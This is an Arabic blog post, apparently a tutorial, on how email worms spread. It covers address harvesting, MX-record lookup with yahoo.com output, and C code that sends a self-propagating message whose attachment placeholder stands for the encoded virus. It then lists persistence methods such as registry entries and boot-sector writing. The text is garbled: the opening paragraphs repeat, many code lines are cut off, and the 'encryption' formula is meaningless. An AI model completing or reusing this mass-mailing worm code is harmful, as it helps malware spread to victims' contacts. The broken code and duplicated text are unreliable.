كيف تتم سرقة البريد الالكتروني الخاص بي؟؟؟
فايروسات البريد
وهي أكثر الفايروسات إنتشارا في العالم لأنها ذكية وذاتية الإنتشار
لتشريح هذا النوع من الفايروسات لازم نأخذة من عدة نواحي
كيف ينشر نفسة و كيف يشغل نفسة بنفسة
طريقة إنتشارة
بعد ما يصمم المبرمج هذا الفايروس يقوم من مكان مجهول بإرسال هذا الفايروس إلى عدد من الإيميلات
وبعدة ينسى أمرة لأن الفايروس سيقوم بنشر نفسة
عندما يشغل أي مستخدم الفايروس بعد أن يستقبلة من البريد تحدث أمور كثيرة
أول ماظهرت هذة الفايروسات كانت تقوم بعمل واحد البحث عن عنواين البريد في الجهاز الضحية
إما أن تكون في دفتر العناوين أو في برنامج البريد وبعدها يرسل نفسة إلى هذة العناوين
وبعد فترة تطورت هذة الفايروسات وصارت طريقة عملها بهذا الشكل
يقوم الفايروس بالبحث عن العناوين في سيرفرات مشهورة مثل
سيرفر الشات أو سيرفر البريد أو قوائم البريد في بعض المواقع
ولكن كيف يقوم بالبحث وإرسال نفسة وكيف يعرف بروتوكولات البريد؟
smpt,pop3
الجواب
لو نرجع لدراست الشبكات والبروتوكولات لوجدنا موضوع مهم نظام أسماء المجالات
DNS
ينقسم هذا المجال لعدة أقسام ما يهمنا في هذا الدرس هو قسم
MX
ومعناة تبادل الرسائل
Mail Exchange
هذا القسم عبارة عن عناوين تبادل الرسائل في سيرفر البريد
لو نلاحظ موقع ياهو يحتوي سجل تبادل الرسائل على العناوين التالية
--------------------------
وهي أكثر الفايروسات إنتشارا في العالم لأنها ذكية وذاتية الإنتشار
لتشريح هذا النوع من الفايروسات لازم نأخذة من عدة نواحي
كيف ينشر نفسة و كيف يشغل نفسة بنفسة
طريقة إنتشارة
بعد ما يصمم المبرمج هذا الفايروس يقوم من مكان مجهول بإرسال هذا الفايروس إلى عدد من الإيميلات
وبعدة ينسى أمرة لأن الفايروس سيقوم بنشر نفسة
عندما يشغل أي مستخدم الفايروس بعد أن يستقبلة من البريد تحدث أمور كثيرة
أول ماظهرت هذة الفايروسات كانت تقوم بعمل واحد البحث عن عنواين البريد في الجهاز الضحية
إما أن تكون في دفتر العناوين أو في برنامج البريد وبعدها يرسل نفسة إلى هذة العناوين
وبعد فترة تطورت هذة الفايروسات وصارت طريقة عملها بهذا الشكل
يقوم الفايروس بالبحث عن العناوين في سيرفرات مشهورة مثل
سيرفر الشات أو سيرفر البريد أو قوائم البريد في بعض المواقع
ولكن كيف يقوم بالبحث وإرسال نفسة وكيف يعرف بروتوكولات البريد؟
smpt,pop3
الجواب
لو نرجع لدراست الشبكات والبروتوكولات لوجدنا موضوع مهم نظام أسماء المجالات
DNS
ينقسم هذا المجال لعدة أقسام ما يهمنا في هذا الدرس هو قسم
MX
ومعناة تبادل الرسائل
Mail Exchange
هذا القسم عبارة عن عناوين تبادل الرسائل في سيرفر البريد
لو نلاحظ موقع ياهو يحتوي سجل تبادل الرسائل على العناوين التالية
--------------------------
yahoo.com MX preference = 1, mail exchanger = mx2.mail.yahoo.c
yahoo.com MX preference = 5, mail exchanger = mx4.mail.yahoo.c
yahoo.com MX preference = 1, mail exchanger = mx1.mail.yahoo.c
yahoo.com nameserver = ns1.yahoo.com
yahoo.com nameserver = ns2.yahoo.com
yahoo.com nameserver = ns3.yahoo.com
yahoo.com nameserver = ns4.yahoo.com
yahoo.com nameserver = ns5.yahoo.com
mx2.mail.yahoo.com internet address = 64.156.215.5
mx2.mail.yahoo.com internet address = 64.156.215.6
mx4.mail.yahoo.com internet address = 216.136.129.15
mx4.mail.yahoo.com internet address = 66.218.86.254
mx4.mail.yahoo.com internet address = 216.136.129.17
mx4.mail.yahoo.com internet address = 66.218.86.253
mx4.mail.yahoo.com internet address = 216.136.129.18
mx1.mail.yahoo.com internet address = 64.157.4.82
mx1.mail.yahoo.com internet address = 64.157.4.83
mx1.mail.yahoo.com internet address = 64.157.4.84
mx1.mail.yahoo.com internet address = 64.156.215.5
ns1.yahoo.com internet address = 66.218.71.63
ns2.yahoo.com internet address = 66.163.169.170
ns3.yahoo.com internet address = 217.12.4.104
ns4.yahoo.com internet address = 63.250.206.138
ns5.yahoo.com internet address = 64.58.77.85
--------------------------
بمعنى أن هذة العناوين
mx1.mail.yahoo.com
mx2.mail.yahoo.com
mx3.mail.yahoo.com
mx4.mail.yahoo.com
عناوين السيرفر الذي يقوم بتبادل الرسائل
وتستطيع عرض سجل البريد لأي موقع عن طريق برنامج الدوس وبهذة الطريقة
nslookup mx yahoo.com
وبعد أن يقوم الفايروس بإظهار عنوان السيرفر يرسل نفسة
أول شيء يقوم بة بناء رسالة تحتوي على ملف مرفق بهذة الطريقة
expand | plain text
char szRcv[MAX_PATH]
//// HELO
strcpy(szRcv,"HELO Yahoo\r\n");
send(sct,szRcv,strlen(szRc
recv(sct,szRcv,MAX_PATH,0)
// MAIL FROM:
strcpy(szRcv,"MAIL FROM: <from@yahoo.com>\r\n");
send(sct,szRcv,strlen(szRc
recv(sct,szRcv,MAX_PATH,0)
//// RCPT TO:
strcpy(szRcv,"RCPT TO: <to@yahoo.com>\r\n");
send(sct,szRcv,strlen(szRc
recv(sct,szRcv,MAX_PATH,0)
//// DATA
strcpy(szRcv,"DATA\r\n");
send(sct,szRcv,strlen(szRc
recv(sct,szRcv,MAX_PATH,0)
--------------------------
//Build Mail
ZeroMemory(szRcv,MAX_PATH)
strcpy(szRcv,"From: from@yahoo.com\r\nTo: to@yahoo.com\r\nDate: 2004\r\nSubject: Ilove You\r\n");
strcpy(BualdMsg,szRcv);
strcat(BualdMsg,"Rq-Mail: WC Mail\r\n");
strcat(BualdMsg,"MIME-Vers
strcat(BualdMsg,"Content-T
strcat(BualdMsg,"This is a multi-part message in MIME format.\r\n\n");
//
strcat(BualdMsg,"--WC_MAIL
strcat(BualdMsg,"Content-T
strcat(BualdMsg,"Content-T
strcat(BualdMsg,"body mail\r\n");
//
strcat(BualdMsg,"--WC_MAIL
strcat(BualdMsg,"Content-T
strcat(BualdMsg,"Content-T
strcat(BualdMsg,"Content-D
strcat(BualdMsg,"EXE Code");
strcat(BualdMsg,"\r\n\n");
strcat(BualdMsg,"--WC_MAIL
strcat(BualdMsg,"\r\n.\r\n
//Send File
send(sct,BualdMsg,strlen(B
recv(sct,szRcv,MAX_PATH,0)
ولكن يجب أن تنتبة لهذة الكلمة في الكود
EXE Code
هذا الكلمة توضع مكانها شفرة الفايروس بعد التشفير
ويتم تشفير الملف بعدة طرق وقانون التشفير هو
plain text
Code<<= 8;
Code |= (indexCode & 0xff);
Code += 8;
وبعدها يتم الإرسال
هذة بكل بساطة دورة تكاثر الفايروس وإنتشارة
أما عن طريقة تشغيل نفسة فالمسألة بسيطة جدا
عن طريق
الريجستري
عن طريق ملفات التأسيس
كتابة نفسة في مقدمة البرامج
كتابة نفسة في قطاع الإقلاع في القرص الصلب
اي استفسار اني حاضر
0 التعليقات:
إرسال تعليق